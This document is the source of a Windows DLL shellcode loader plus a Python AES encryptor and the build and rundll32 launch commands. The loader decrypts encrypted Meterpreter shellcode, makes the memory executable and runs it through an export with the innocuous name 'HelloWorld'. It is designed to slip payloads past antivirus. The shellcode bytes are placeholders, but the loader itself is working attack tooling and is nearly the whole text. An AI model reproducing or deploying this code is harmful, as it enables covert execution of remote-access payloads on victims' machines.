gotem.cpp
#include <windows.h>
#include <stdio.h>
#include <wincrypt.h>
#pragma comment (lib, "crypt32.lib")
#pragma comment (lib, "user32.lib")
void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;
if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
printf("Failed in CryptAcquireContextW (%u)\n", GetLastError());
return;
}
if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
printf("Failed in CryptCreateHash (%u)\n", GetLastError());
return;
}
if (!CryptHashData(hHash, (BYTE*)key, keyLen, 0)) {
printf("Failed in CryptHashData (%u)\n", GetLastError());
return;
}
if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
printf("Failed in CryptDeriveKey (%u)\n", GetLastError());
return;
}
if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)shellcode, &shellcodeLen)) {
printf("Failed in CryptDecrypt (%u)\n", GetLastError());
return;
}
CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
extern "C" {
__declspec(dllexport) BOOL WINAPI HelloWorld(void) {
unsigned char AESkey[] = { ...rando key from aes_encryptor tool... };
unsigned char payload[] = { ...encrypted met shellcode output from the aes_encryptor tool... };
DWORD payload_length = sizeof(payload);
LPVOID alloc_mem = VirtualAlloc(NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!alloc_mem) {
printf("Failed to Allocate memory (%u)\n", GetLastError());
return -1;
}
DecryptAES((char*)payload, payload_length, AESkey, sizeof(AESkey));
MoveMemory(alloc_mem, payload, sizeof(payload));
//RtlMoveMemory(alloc_mem, payload, sizeof(payload));
DWORD oldProtect;
if (!VirtualProtect(alloc_mem, sizeof(payload), PAGE_EXECUTE_READ, &oldProtect)) {
printf("Failed to change memory protection (%u)\n", GetLastError());
return -2;
}
HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)alloc_mem, NULL, 0, NULL);
if (!tHandle) {
printf("Failed to Create the thread (%u)\n", GetLastError());
return -3;
}
printf("\n\nalloc_mem : %p\n", alloc_mem);
WaitForSingleObject(tHandle, INFINITE);
getchar();
((void(*)())alloc_mem)();
return 0;
return TRUE;
}
}
- pip install pycryptodome aes_crypt.py
import sys
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from os import urandom
import hashlib
def AESencrypt(plaintext, key):
k = hashlib.sha256(KEY).digest()
iv = 16 * b'\x00'
plaintext = pad(plaintext, AES.block_size)
cipher = AES.new(k, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(plaintext)
return ciphertext,key
def printResult(key, ciphertext):
print('char AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
print('unsigned char AESshellcode[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')
try:
file = open(sys.argv[1], "rb")
content = file.read()
except:
print("Usage: .\AES_cryptor.py PAYLOAD_FILE")
sys.exit()
KEY = urandom(16)
ciphertext, key = AESencrypt(content, KEY)
printResult(KEY,ciphertext)
x86_64-w64-mingw32-g++ -shared -o bind.dll bind.cpp -fpermissive
...
rundll32.exe bind.dll, HelloWorld